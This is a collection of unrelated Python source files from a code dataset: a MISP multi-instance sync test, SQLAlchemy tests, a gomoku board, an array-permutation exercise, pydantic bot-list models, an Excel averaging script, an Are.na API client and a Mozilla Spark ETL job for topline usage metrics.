'eYQdGTEWZJ8C2lm9EpnMqxQGwGiPNyoR75JvLdlE'\nverifycert = False\n\n\nurllib3.disable_warnings()\n\n'''\nStatic IP config\n\nauto eth1\niface eth1 inet static\naddress 192.168.1.XXX\nnetmask 255.255.255.0\nnetwork 192.168.1.0\nbroadcast 192.168.1.255\n'''\n\nmisp_instances = [\n {\n 'url': 'https://localhost:8643',\n 'external_baseurl': 'https://192.168.1.1',\n 'key': key,\n 'orgname': 'First org',\n 'email_admin': 'first@admin.local',\n 'email_user': 'first@user.local'\n },\n {\n 'url': 'https://localhost:8644',\n 'external_baseurl': 'https://192.168.1.2',\n 'key': key,\n 'orgname': 'Second org',\n 'email_admin': 'second@admin.local',\n 'email_user': 'second@user.local'\n },\n {\n 'url': 'https://localhost:8645',\n 'external_baseurl': 'https://192.168.1.3',\n 'key': key,\n 'orgname': 'Third org',\n 'email_admin': 'third@admin.local',\n 'email_user': 'third@user.local'\n },\n]\n\n# Assumes the VMs are already started, doesn't shut them down\nfast_mode = True\n\n\nclass MISPInstance():\n\n def __init__(self, params):\n self.site_admin_connector = ExpandedPyMISP(params['url'], params['key'], ssl=False, debug=False)\n # Set the default role (id 3 on the VM is normal user)\n self.site_admin_connector.set_default_role(3)\n if not fast_mode:\n # Git pull\n self.site_admin_connector.update_misp()\n # Load submodules\n self.site_admin_connector.update_object_templates()\n self.site_admin_connector.update_galaxies()\n self.site_admin_connector.update_noticelists()\n self.site_admin_connector.update_warninglists()\n self.site_admin_connector.update_taxonomies()\n\n self.site_admin_connector.toggle_global_pythonify()\n\n # Create organisation\n organisation = MISPOrganisation()\n organisation.name = params['orgname']\n self.test_org = self.site_admin_connector.add_organisation(organisation)\n print(self.test_org.name, self.test_org.uuid)\n # Create org admin\n user = MISPUser()\n user.email = params['email_admin']\n user.org_id = self.test_org.id\n user.role_id = 2 # Org admin\n self.test_admin = self.site_admin_connector.add_user(user)\n self.org_admin_connector = ExpandedPyMISP(params['url'], self.test_admin.authkey, ssl=False, debug=False)\n self.org_admin_connector.toggle_global_pythonify()\n # 
Create user\n user = MISPUser()\n user.email = params['email_user']\n user.org_id = self.test_org.id\n self.test_usr = self.org_admin_connector.add_user(user)\n self.usr_connector = ExpandedPyMISP(params['url'], self.test_admin.authkey, ssl=False, debug=False)\n self.usr_connector.toggle_global_pythonify()\n\n # Setup external_baseurl\n self.site_admin_connector.set_server_setting('MISP.external_baseurl', params['external_baseurl'], force=True)\n\n self.external_base_url = params['external_baseurl']\n self.sync = []\n\n def create_sync_user(self, organisation):\n sync_org = self.site_admin_connector.add_organisation(organisation)\n short_org_name = sync_org.name.lower().replace(' ', '-')\n user = MISPUser()\n user.email = f\"sync_user@{short_org_name}.local\"\n user.org_id = sync_org.id\n user.role_id = 5 # Org admin\n sync_user = self.site_admin_connector.add_user(user)\n self.sync.append((sync_org, sync_user, self.external_base_url))\n\n def create_sync_server(self, name, remote_url, authkey, organisation):\n server = MISPServer()\n server.name = name\n server.self_signed = True\n server.url = remote_url\n server.authkey = authkey\n server.remote_org_id = organisation.id\n server = self.site_admin_connector.add_server(server)\n r = self.site_admin_connector.test_server(server)\n print(r)\n\n def cleanup(self):\n for org, user, remote_url in self.sync:\n self.site_admin_connector.delete_user(user) # Delete user from other org\n self.site_admin_connector.delete_organisation(org)\n\n # Delete sync servers\n for server in self.site_admin_connector.servers():\n self.site_admin_connector.delete_server(server)\n\n # Delete users\n self.org_admin_connector.delete_user(self.test_usr.id)\n self.site_admin_connector.delete_user(self.test_admin.id)\n # Delete org\n self.site_admin_connector.delete_organisation(self.test_org.id)\n\n\nclass TestSync(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n if not fast_mode:\n subprocess.Popen(['VBoxHeadless', '-s', 'Test Sync 1'])\n subprocess.Popen(['VBoxHeadless', '-s', 'Test Sync 2'])\n subprocess.Popen(['VBoxHeadless', '-s', 'Test Sync 3'])\n time.sleep(30)\n cls.maxDiff = None\n cls.instances = []\n for misp_instance in misp_instances:\n mi = MISPInstance(misp_instance)\n cls.instances.append(mi)\n\n # Create all sync users\n test_orgs = [i.test_org for i in cls.instances]\n\n for instance in cls.instances:\n for test_org in test_orgs:\n if instance.test_org.name == test_org.name:\n continue\n instance.create_sync_user(test_org)\n\n # Create all sync links\n sync_identifiers = [i.sync for i in cls.instances]\n for instance in cls.instances:\n for sync_identifier in sync_identifiers:\n for org, user, remote_url in sync_identifier:\n if org.name != instance.test_org.name:\n continue\n instance.create_sync_server(name=f'Sync with {remote_url}',\n remote_url=remote_url,\n authkey=user.authkey,\n organisation=instance.test_org)\n\n @classmethod\n def tearDownClass(cls):\n for i in cls.instances:\n i.cleanup()\n if not fast_mode:\n subprocess.Popen(['VBoxManage', 'controlvm', 'Test Sync 1', 'poweroff'])\n subprocess.Popen(['VBoxManage', 'controlvm', 'Test Sync 2', 'poweroff'])\n subprocess.Popen(['VBoxManage', 'controlvm', 'Test Sync 3', 'poweroff'])\n time.sleep(20)\n subprocess.Popen(['VBoxManage', 'snapshot', 'Test Sync 1', 'restore', 'Snapshot 1'])\n subprocess.Popen(['VBoxManage', 'snapshot', 'Test Sync 2', 'restore', 'Snapshot 1'])\n subprocess.Popen(['VBoxManage', 'snapshot', 'Test Sync 3', 'restore', 'Snapshot 1'])\n\n def 
test_simple_sync(self):\n server = MISPServer()\n server.name = 'Second Instance'\n server.url = misp_instances[1]['external_baseurl']\n","sub_path":"tests/testlive_sync.py","file_name":"testlive_sync.py","file_ext":"py","file_size_in_byte":7357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"147733335","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.macosx-10.3-i386/egg/collective/lead/tests.py\n# Compiled at: 2008-04-27 07:30:45\nimport os, unittest, transaction, sqlalchemy as sa\nfrom sqlalchemy import orm, sql\nfrom collective.lead import Database, tx\nfrom collective.lead.interfaces import IDatabase, ITransactionAware\nfrom zope.component import provideAdapter, provideUtility, getUtility\nDB_NAME = 'collective.lead.tests.testlead'\nLeadDataManager = tx.ThreadlocalDatabaseDataManager\nprovideAdapter(tx.ThreadlocalDatabaseTransactions, adapts=(Database,), provides=ITransactionAware)\n\nclass SimpleModel(object):\n __module__ = __name__\n\n def __init__(self, **kw):\n for (k, v) in kw.items():\n setattr(self, k, v)\n\n def asDict(self):\n return dict((k.startswith('_') or (k, v) for (k, v) in self.__dict__.items()))\n\n\nclass User(SimpleModel):\n __module__ = __name__\n\n\nclass Skill(SimpleModel):\n __module__ = __name__\n\n\nclass TestDatabase(Database):\n __module__ = __name__\n _url = os.environ.get('TEST_DSN', 'sqlite:///test')\n\n def _setup_tables(self, metadata, tables):\n tables['test_users'] = sa.Table('test_users', metadata, sa.Column('id', sa.Integer, primary_key=True), sa.Column('firstname', sa.Text), sa.Column('lastname', sa.Text))\n tables['test_skills'] = sa.Table('test_skills', metadata, sa.Column('id', sa.Integer, primary_key=True), sa.Column('user_id', sa.Integer), sa.Column('name', sa.Text), sa.ForeignKeyConstraint(('user_id', ), ('test_users.id', )))\n\n def _setup_mappers(self, tables, mappers):\n mappers['test_users'] = orm.mapper(User, tables['test_users'], properties={'skills': orm.relation(Skill, primaryjoin=tables['test_users'].columns['id'] == tables['test_skills'].columns['user_id'])})\n mappers['test_skills'] = orm.mapper(Skill, tables['test_skills'])\n\n\ndef setup_db():\n db = TestDatabase()\n provideUtility(db, IDatabase, name=DB_NAME)\n\n\nsetup_db()\n\nclass LeadTests(unittest.TestCase):\n __module__ = __name__\n\n @property\n def db(self):\n return getUtility(IDatabase, name=DB_NAME)\n\n def setUp(self):\n pass\n\n def tearDown(self):\n transaction.abort()\n\n def testAAA(self):\n ignore = self.db.session\n self.db._metadata.drop_all()\n self.db._metadata.create_all()\n transaction.commit()\n\n def testzzz(self):\n self.db._metadata.drop_all()\n transaction.commit()\n\n def testSimplePopulation(self):\n session = self.db.session\n query = session.query(User)\n rows = query.all()\n self.assertEqual(len(rows), 0)\n session.save(User(id=1, firstname='udo', lastname='juergens'))\n session.save(User(id=2, firstname='heino', lastname='n/a'))\n session.flush()\n rows = query.order_by(query.table.c.id).all()\n self.assertEqual(len(rows), 2)\n row1 = rows[0]\n d = row1.asDict()\n self.assertEqual(d, {'firstname': 'udo', 'lastname': 'juergens', 'id': 1})\n stmt = sql.select(query.table.columns).order_by('id')\n results = self.db.connection.execute(stmt)\n self.assertEqual(results.fetchall(), [(1, 'udo', 'juergens'), (2, 'heino', 'n/a')])\n 
transaction.abort()\n self.db._metadata.create_all()\n results = self.db.connection.execute(stmt)\n self.assertEqual(results.fetchall(), [])\n\n def testXXRelations(self):\n session = self.db.session\n session.save(User(id=1, firstname='foo', lastname='bar'))\n user = session.query(User).filter_by(firstname='foo')[0]\n user.skills.append(Skill(id=1, name='Zope'))\n session.flush()\n\n def testTransactionJoining(self):\n transaction.abort()\n t = transaction.get()\n self.failIf([ r for r in t._resources if r.__class__ is LeadDataManager ], 'Joined transaction too early')\n ignore = self.db.session\n self.failUnless([ r for r in t._resources if r.__class__ is LeadDataManager ], 'Not joined transaction')\n\n\ndef test_suite():\n from unittest import TestSuite, makeSuite\n suite = TestSuite()\n suite.addTest(makeSuite(LeadTests))\n return suite","sub_path":"pycfiles/collective.leadmedia-0.1.tar/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"644422914","text":"class GameBoard:\n \n def __init__(self, rows, columns):\n self.rows = rows\n self.columns = columns\n self.board = [[0 for j in range(columns)] for i in range(rows)]\n \n def get_board(self):\n return self.board\n \n def get_rows(self):\n return self.rows\n \n def get_columns(self):\n return self.columns\n \n def move(self, coords, player):\n row = coords[0]\n column = coords[1]\n if row in range(self.rows) and column in range(self.columns) and self.board[row][column] == 0:\n self.board[row][column] = player\n return True\n else:\n return False\n \n def check_winner(self):\n lines = []\n symbols = [\" \", \"w\", \"b\"]\n for i in range(self.rows):\n row, col, dd1, dd2, du1, du2 = \"\", \"\", \"\", \"\", \"\", \"\"\n for j in range(self.columns):\n row += symbols[self.board[i][j]]\n col += symbols[self.board[j][i]]\n if i + j >= 0 and i + j < self.rows:\n dd1 += symbols[self.board[i + j][j]]\n du1 += symbols[self.board[self.rows - 1 - i - j][j]]\n if i != 0:\n dd2 += symbols[self.board[j][i + j]]\n du2 += symbols[self.board[self.rows - 1 - j][i + j]]\n lines.extend((row, col, dd1, dd2, du1, du2))\n for line in lines:\n if \"wwwww\" in line:\n return 1\n if \"bbbbb\" in line:\n return -1\n tie = True\n for row in self.board:\n if 0 in row:\n tie = False\n if tie:\n return 2\n return 0\n \n def get_winning_line(self, last_move):\n row = last_move[0]\n col = last_move[1]\n player = self.board[row][col]\n endsquare = None\n #check row\n rowcounter = 0\n colcounter = 0\n d1counter = 0\n d2counter = 0\n cexists = False\n rexists = False\n for i in range(-4, 5):\n if col + i >= 0 and col + i < len(self.board):\n cexists = True\n if self.board[row][col+i] == player:\n rowcounter += 1\n if rowcounter == 5:\n endsquare = (\"r\", (row, col+i))\n break\n else:\n rowcounter = 0\n else:\n cexists = False\n if row + i >= 0 and row + i < len(self.board):\n rexists = True\n if self.board[row + i][col] == player:\n colcounter += 1\n if colcounter == 5:\n endsquare = (\"c\", (row + i, col))\n break\n else:\n colcounter = 0\n else:\n rexists = False\n if rexists and cexists:\n if self.board[row + i][col + i] == player:\n d1counter += 1\n if d1counter == 5:\n endsquare = (\"d1\", (row + i, col + i))\n break\n else:\n d1counter = 0\n if cexists and row - i >= 0 and row - i < len(self.board):\n if self.board[row - i][col + i] == player:\n d2counter += 1\n if d2counter == 5:\n endsquare = (\"d2\", (row - i, col + i))\n break\n 
else:\n d2counter = 0\n if endsquare[0] == \"r\":\n pos = endsquare[1][1]\n return [(row, x) for x in range(pos - 4, pos + 1)]\n elif endsquare[0] == \"c\":\n pos = endsquare[1][0]\n return [(x, col) for x in range(pos - 4, pos + 1)]\n elif endsquare[0] == \"d1\":\n r = endsquare[1][0]\n c = endsquare[1][1]\n return [(r + x, c + x) for x in range(-4, 1)]\n else:\n r = endsquare[1][0]\n c = endsquare[1][1]\n return [(r - x, c + x) for x in range(-4,1)]\n ","sub_path":"projekt/game_board.py","file_name":"game_board.py","file_ext":"py","file_size_in_byte":4113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"436702731","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 29 18:36:04 2017\n\nEPI 6.13 Permute the elements of an array\n\nGiven an array A=[a,b,c,d] and a permutation array P=[2,0,1,3]\n\nIf we apply P to A, then we get A=[b, c, a, d]\n\nIt is simple to apply a permutation-array to a given array if additional storage\nis available to write the resulting array.\n\nGiven and array A of n elements and a permutation P, apply P to A using only\nconstant additional storage. Use A itself to store the result\n\n\"\"\"\n\ndef PermuteElementsOfArray_Naive(A, P):\n '''Uses O(n) additional space '''\n \n temp = [None]*len(A)\n \n for i, p in enumerate(P):\n temp[p] = A[i]\n \n return temp\n\n\ndef PermuteElementsOfArray_Partial(A, P):\n ''' Should use O(1) additional space '''\n \n N = len(A)\n \n for i in range(N):\n start_index = i\n next_index = P[start_index]\n \n curr_index = start_index \n curr = A[curr_index]\n nextv = A[next_index]\n \n \n while next_index != start_index:\n \n print('A: {} next_index: {}'.format(A, next_index))\n A[next_index] = curr\n next_index = P[next_index]\n\n \n curr = nextv\n nextv = A[next_index]\n\n A[next_index] = curr\n print('curr: {} nextv: {} next_index: {} A: {} P:{}'.format(curr, nextv, next_index, A, P))\n \n\n return A\n\ndef PermuteElementsOfArray(A, P):\n ''' Should use O(1) additional space '''\n \n N = len(A)\n \n# for i in range(1):\n for i in range(N):\n \n if not P[i]:\n continue\n \n start_index = i\n next_index = P[start_index]\n \n curr_index = start_index \n curr = A[curr_index]\n nextv = A[next_index]\n \n P[start_index] = None\n \n while next_index != start_index:\n \n print('A: {} next_index: {}'.format(A, next_index))\n A[next_index] = curr\n \n nextprev = next_index\n next_index = P[next_index]\n\n P[nextprev] = None\n \n curr = nextv\n nextv = A[next_index]\n\n A[next_index] = curr\n print('curr: {} nextv: {} next_index: {} A: {} P:{}'.format(curr, nextv, next_index, A, P))\n \n\n return A\n\ndef main():\n print('Permute elements of an array')\n \n# A, P = (['a', 'b', 'c', 'd'], [2, 0, 1, 3])\n# A, P = (['a', 'b', 'c', 'd'], [3, 2, 1, 0])\n A, P = (['a', 'b', 'c', 'd', 'e'], [2,3,4,0,1])\n A, P = (['a', 'b', 'c', 'd', 'e'], [2,1,0,3,4])\n\n res = PermuteElementsOfArray_Naive(A, P)\n print('A: {} P: {} --> Permuted Array: {}'.format(A, P, res))\n res2 = PermuteElementsOfArray(A, P)\n print('A: {} P: {} --> Permuted Array: {}'.format(A, P, res2))\n \n \n\nif __name__ == '__main__':\n main()\n","sub_path":"mulakat/EPI06_Arrays/permuteElementsOfArray.py","file_name":"permuteElementsOfArray.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"103050981","text":"import uuid\nfrom typing import List, Optional\n\nfrom pydantic import BaseModel, validator\n\nimport modules.models.enums 
as enums\n\nfrom ..base_models import APIResponse, BaseUser\n\nclass UserJSPatch(BaseModel):\n    js_allowed: bool\n\nclass UserDescEdit(BaseModel):\n    description: str\n\nclass BotMeta(BaseModel):\n    \"\"\"\n    Notes:\n\n    - extra_owners must be a list of strings where the strings\n    can be made an integer\n    \"\"\"\n    prefix: str\n    library: str\n    invite: str\n    website: Optional[str] = None\n    description: str\n    banner_card: Optional[str] = None\n    banner_page: Optional[str] = None\n    keep_banner_decor: bool\n    extra_owners: List[str]  # List of strings that can be turned into an integer\n    support: Optional[str] = None\n    long_description: str\n    css: Optional[str] = None\n    long_description_type: enums.LongDescType\n    nsfw: bool\n    donate: Optional[str] = None\n    privacy_policy: Optional[str] = None\n    github: Optional[str] = None\n    webhook_type: Optional[int] = 0\n    webhook: Optional[str] = None\n    webhook_secret: Optional[str] = None\n    vanity: str\n    features: List[str] = []\n    tags: List[str]\n\n    @validator(\"extra_owners\")\n    def extra_owner_converter(cls, v, values, **kwargs):\n        # Deduplicate after converting: the original compared the str against a list of ints, so no duplicate was ever dropped\n        eos = []\n        for eo in v:\n            if eo.isdigit() and int(eo) not in eos:\n                eos.append(int(eo))\n        return eos\n\nclass OwnershipTransfer(BaseModel):\n    new_owner: str\n\n    @validator(\"new_owner\")\n    def new_owner_validator(cls, v, values, **kwargs):\n        try:\n            new_owner = str(v)\n        except:\n            raise ValueError(\"Invalid new owner\")\n        return new_owner\n\nclass BotAppeal(BaseModel):\n    appeal: str\n\n","sub_path":"modules/discord/api/v2/users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"415871963","text":"# -*- coding: utf-8 -*-\nimport os\nimport glob\nimport xlrd\n\n\ndef heightEx(xlsfile):\n    wb = xlrd.open_workbook(xlsfile)\n    sheet = wb.sheet_by_name('フリー線分')  # sheet name ('free line segment') must match the workbook, so it is kept as-is\n    return sheet.cell_value(49,11)\n\n\ndef main():\n    l = glob.glob(\"./*.xls\")\n    FTlist = [[0 for i in range(2)] for j in range(9)]\n    ds = ['d2.5', 'd1.4', 'd0.8', 'd0.6', 'd0.4', 'd0.2', 'd0.1']\n\n    for x,name in enumerate(l):\n        print(name, heightEx(name))\n        FTlist[0][0] += 1\n        FTlist[0][1] += heightEx(name)\n\n        for y, d in enumerate(ds):\n            if d in name:\n                idx = y + 1\n                break\n        else:\n            idx = len(ds) + 1\n\n        FTlist[idx][0] += 1\n        FTlist[idx][1] += heightEx(name)\n\n    for z in range(9):\n        if FTlist[z][0] != 0:\n            print(\"No.\", z, \"file count\", FTlist[z][0], \"total\", FTlist[z][1], \"average\", FTlist[z][1] / FTlist[z][0])\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"FilmThickness.py","file_name":"FilmThickness.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"322450088","text":"import requests\nfrom functools import wraps\n\nBASE_URL = 'http://api.are.na/v2'\n\n\ndef paginated(fn):\n    @wraps(fn)\n    def decorated(*args, page=0, per_page=15, **kwargs):\n        params = kwargs.get('params', {})\n        params.update({\n            'page': page,\n            'per': per_page})\n        kwargs['params'] = params\n        return fn(*args, **kwargs)\n    return decorated\n\n\nclass Resource():\n    def __init__(self, access_token=None):\n        self.access_token = access_token\n\n    def _headers(self, auth):\n        if auth:\n            if self.access_token is not None:\n                return {\n                    'Authorization': 'Bearer {}'.format(self.access_token)\n                }\n            elif self.auth_token is not None:\n                return {\n                    'X-AUTH-TOKEN': self.auth_token\n                }\n            raise AttributeError('No access token or auth token is set')\n        return {}\n\n    def _get(self, endpoint, params=None, auth=False):\n        resp 
= requests.get(\n ''.join([BASE_URL, self.base_endpoint, endpoint]),\n params=params or {},\n headers=self._headers(auth))\n if resp.status_code != 200:\n resp.raise_for_status()\n return resp.json()\n\n def _post(self, endpoint, data, params=None):\n resp = requests.post(\n ''.join([BASE_URL, self.base_endpoint, endpoint]),\n params=params or {},\n headers=self._headers(True),\n json=data)\n if resp.status_code != 200:\n resp.raise_for_status()\n return resp.json()\n\n def _put(self, endpoint, data, params=None):\n resp = requests.put(\n ''.join([BASE_URL, self.base_endpoint, endpoint]),\n params=params or {},\n headers=self._headers(True),\n json=data)\n if resp.status_code != 200:\n resp.raise_for_status()\n return resp.json()\n\n def _delete(self, endpoint, params=None):\n resp = requests.delete(\n ''.join([BASE_URL, self.base_endpoint, endpoint]),\n params=params or {},\n headers=self._headers(True))\n if resp.status_code != 200:\n resp.raise_for_status()\n return resp.json()\n","sub_path":"arena/resource.py","file_name":"resource.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"152498498","text":"import logging\nimport operator\nfrom datetime import datetime\n\nimport arrow\nimport click\nfrom pyspark.sql import types, SparkSession, functions as F\nfrom pyspark.sql.window import Window\n\nfrom mozetl.topline.schema import topline_schema\nfrom mozetl.constants import SEARCH_SOURCE_WHITELIST\nfrom functools import reduce\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n# fmt: off\ncountries = {\n \"AD\", \"AE\", \"AF\", \"AG\", \"AI\", \"AL\", \"AM\", \"AO\", \"AQ\", \"AR\", \"AS\",\n \"AT\", \"AU\", \"AW\", \"AX\", \"AZ\", \"BA\", \"BB\", \"BD\", \"BE\", \"BF\", \"BG\",\n \"BH\", \"BI\", \"BJ\", \"BL\", \"BM\", \"BN\", \"BO\", \"BQ\", \"BR\", \"BS\", \"BT\",\n \"BV\", \"BW\", \"BY\", \"BZ\", \"CA\", \"CC\", \"CD\", \"CF\", \"CG\", \"CH\", \"CI\",\n \"CK\", \"CL\", \"CM\", \"CN\", \"CO\", \"CR\", \"CU\", \"CV\", \"CW\", \"CX\", \"CY\",\n \"CZ\", \"DE\", \"DJ\", \"DK\", \"DM\", \"DO\", \"DZ\", \"EC\", \"EE\", \"EG\", \"EH\",\n \"ER\", \"ES\", \"ET\", \"FI\", \"FJ\", \"FK\", \"FM\", \"FO\", \"FR\", \"GA\", \"GB\",\n \"GD\", \"GE\", \"GF\", \"GG\", \"GH\", \"GI\", \"GL\", \"GM\", \"GN\", \"GP\", \"GQ\",\n \"GR\", \"GS\", \"GT\", \"GU\", \"GW\", \"GY\", \"HK\", \"HM\", \"HN\", \"HR\", \"HT\",\n \"HU\", \"ID\", \"IE\", \"IL\", \"IM\", \"IN\", \"IO\", \"IQ\", \"IR\", \"IS\", \"IT\",\n \"JE\", \"JM\", \"JO\", \"JP\", \"KE\", \"KG\", \"KH\", \"KI\", \"KM\", \"KN\", \"KP\",\n \"KR\", \"KW\", \"KY\", \"KZ\", \"LA\", \"LB\", \"LC\", \"LI\", \"LK\", \"LR\", \"LS\",\n \"LT\", \"LU\", \"LV\", \"LY\", \"MA\", \"MC\", \"MD\", \"ME\", \"MF\", \"MG\", \"MH\",\n \"MK\", \"ML\", \"MM\", \"MN\", \"MO\", \"MP\", \"MQ\", \"MR\", \"MS\", \"MT\", \"MU\",\n \"MV\", \"MW\", \"MX\", \"MY\", \"MZ\", \"NA\", \"NC\", \"NE\", \"NF\", \"NG\", \"NI\",\n \"NL\", \"NO\", \"NP\", \"NR\", \"NU\", \"NZ\", \"OM\", \"PA\", \"PE\", \"PF\", \"PG\",\n \"PH\", \"PK\", \"PL\", \"PM\", \"PN\", \"PR\", \"PS\", \"PT\", \"PW\", \"PY\", \"QA\",\n \"RE\", \"RO\", \"RS\", \"RU\", \"RW\", \"SA\", \"SB\", \"SC\", \"SD\", \"SE\", \"SG\",\n \"SH\", \"SI\", \"SJ\", \"SK\", \"SL\", \"SM\", \"SN\", \"SO\", \"SR\", \"SS\", \"ST\",\n \"SV\", \"SX\", \"SY\", \"SZ\", \"TC\", \"TD\", \"TF\", \"TG\", \"TH\", \"TJ\", \"TK\",\n \"TL\", \"TM\", \"TN\", \"TO\", \"TR\", \"TT\", \"TV\", \"TW\", \"TZ\", \"UA\", \"UG\",\n 
\"UM\", \"US\", \"UY\", \"UZ\", \"VA\", \"VC\", \"VE\", \"VG\", \"VI\", \"VN\", \"VU\",\n \"WF\", \"WS\", \"YE\", \"YT\", \"ZA\", \"ZM\", \"ZW\"\n}\n# fmt: on\n\nseconds_per_hour = 60 * 60\nseconds_per_day = seconds_per_hour * 24\n\n\ndef column_like(name, patterns, default):\n \"\"\" patterns: dict[label, list[match_expr]]\"\"\"\n # start with the pyspark.sql.functions\n op = F\n for label in patterns:\n cond = reduce(\n operator.__or__, [F.col(name).like(pat) for pat in patterns[label]]\n )\n op = op.when(cond, label)\n return op.otherwise(default)\n\n\ndef clean_input(dataframe, start, end):\n input_columns = [\n \"client_id\",\n \"timestamp\",\n \"is_default_browser\",\n \"search_counts\",\n \"country\",\n \"profile_creation_date\",\n \"channel\",\n \"os\",\n \"hours\",\n ]\n columns = {col: F.col(col) for col in input_columns}\n\n # normalize countries against a whitelist\n columns[\"country\"] = (\n F.when(F.col(\"country\").isin(countries), F.col(\"country\"))\n .otherwise(\"Other\")\n .alias(\"country\")\n )\n\n # clean operating system based on CEP naming scheme\n pattern = {\n \"Windows\": [\"Windows%\", \"WINNT%\"],\n \"Mac\": [\"Darwin%\"],\n \"Linux\": [\"%Linux%\", \"%BSD%\", \"%SunOS%\"],\n }\n columns[\"os\"] = column_like(\"os\", pattern, \"Other\")\n\n # rename normalized channel to channel\n columns[\"channel\"] = F.col(\"normalized_channel\")\n\n # convert profile creation date into seconds (day -> seconds)\n columns[\"profile_creation_date\"] = (\n F.when(\n F.col(\"profile_creation_date\") >= 0,\n F.col(\"profile_creation_date\") * seconds_per_day,\n )\n .otherwise(0.0)\n .cast(types.DoubleType())\n )\n\n # generate hours of usage from subsession length (seconds -> hours)\n columns[\"hours\"] = (\n F.when(\n (F.col(\"subsession_length\") >= 0)\n & (F.col(\"subsession_length\") < 180 * seconds_per_day),\n F.col(\"subsession_length\") / seconds_per_hour,\n )\n .otherwise(0.0)\n .cast(types.DoubleType())\n )\n\n # clean the dataset\n clean = (\n dataframe.where(F.col(\"submission_date_s3\") >= start)\n .where(F.col(\"submission_date_s3\") < end)\n .select([expr.alias(name) for name, expr in columns.items()])\n )\n\n return clean\n\n\ndef search_aggregates(dataframe, attributes):\n # search engines to pivot against\n search_labels = [\"google\", \"bing\", \"yahoo\", \"other\"]\n\n # patterns to filter search engines\n patterns = {\n \"google\": [\"%Google%\", \"%google%\"],\n \"bing\": [\"%Bing%\", \"%bing%\"],\n \"yahoo\": [\"%Yahoo%\", \"%yahoo%\"],\n }\n\n s_engine = column_like(\"search_count.engine\", patterns, \"other\").alias(\"engine\")\n s_count = (\n F.when(F.col(\"search_count.count\") > 0, F.col(\"search_count.count\"))\n .otherwise(0)\n .alias(\"count\")\n )\n\n # generate the search aggregates by exploding and pivoting\n search = (\n dataframe.withColumn(\"search_count\", F.explode(\"search_counts\"))\n .where(\n F.col(\"search_count.source\").isNull()\n | F.col(\"search_count.source\").isin(SEARCH_SOURCE_WHITELIST)\n )\n .select(\"country\", \"channel\", \"os\", s_engine, s_count)\n .groupBy(attributes)\n .pivot(\"engine\", search_labels)\n .agg(F.sum(\"count\"))\n .na.fill(0, search_labels)\n )\n\n return search\n\n\ndef hours_aggregates(dataframe, attributes):\n \"\"\" Aggregate hours over the set of attributes\"\"\"\n # simple aggregate\n hours = dataframe.groupBy(attributes).agg(F.sum(\"hours\").alias(\"hours\"))\n return hours\n\n\ndef client_aggregates(dataframe, timestamp, attributes):\n \"\"\"Aggregates clients by properties such as being new or set 
as default. \"\"\"\n\n select_expr = {col: F.col(col) for col in attributes}\n\n select_expr[\"new_client\"] = F.when(\n F.col(\"profile_creation_date\") >= timestamp, 1\n ).otherwise(0)\n\n select_expr[\"default_client\"] = F.when(F.col(\"is_default_browser\"), 1).otherwise(0)\n\n select_expr[\"clientid_rank\"] = F.row_number().over(\n Window.partitionBy(\"client_id\").orderBy(F.desc(\"timestamp\"))\n )\n\n clients = (\n dataframe.select([expr.alias(name) for name, expr in select_expr.items()])\n .where(\"clientid_rank = 1\")\n .groupBy(attributes)\n .agg(\n F.count(\"*\").alias(\"actives\"),\n F.sum(\"new_client\").alias(\"new_records\"),\n F.sum(\"default_client\").alias(\"default\"),\n )\n )\n\n return clients\n\n\ndef transform(dataframe, start, mode):\n # attributes that break down the aggregates\n attributes = [\"country\", \"channel\", \"os\"]\n\n end = get_end_date(start, mode)\n # clean the dataset\n df = clean_input(dataframe, start, end)\n\n # find the timestamp in seconds to find new profiles\n report_delta = datetime.strptime(start, \"%Y%m%d\") - datetime(1970, 1, 1)\n report_timestamp = report_delta.total_seconds()\n\n # generate aggregates\n clients = client_aggregates(df, report_timestamp, attributes)\n searches = search_aggregates(df, attributes)\n hours = hours_aggregates(df, attributes)\n\n # take the outer join of all aggregates and replace null values with zeros\n return (\n clients.join(searches, attributes, \"outer\")\n .join(hours, attributes, \"outer\")\n .withColumnRenamed(\"country\", \"geo\")\n .withColumn(\"crashes\", F.lit(0).astype(\"long\"))\n .na.fill(0)\n )\n\n\ndef get_end_date(ds_start, period):\n \"\"\" Return the end date given the start date and period. \"\"\"\n date_start = arrow.get(ds_start, \"YYYYMMDD\")\n if period == \"monthly\":\n date_end = date_start.replace(months=+1)\n else:\n date_end = date_start.replace(days=+7)\n ds_end = date_end.format(\"YYYYMMDD\")\n\n return ds_end\n\n\ndef format_spark_path(bucket, prefix):\n return \"s3://{}/{}\".format(bucket, prefix)\n\n\ndef extract(spark, path):\n \"\"\"Extract the source dataframe from the spark compatible path.\n\n spark: SparkSession\n path: path to parquet files in s3\n ds_start: inclusive date\n \"\"\"\n return spark.read.option(\"mergeSchema\", \"true\").parquet(path)\n\n\ndef save(dataframe, bucket, prefix, version, mode, start_date):\n prefix = \"{}/v{}/mode={}/report_start={}\".format(prefix, version, mode, start_date)\n location = format_spark_path(bucket, prefix)\n logger.info(\"Writing topline summary to {}\".format(location))\n\n # report start is implicit in the partition path\n fields = [col for col in topline_schema.names if col != \"report_start\"]\n (dataframe.select(fields).repartition(1).write.parquet(location, 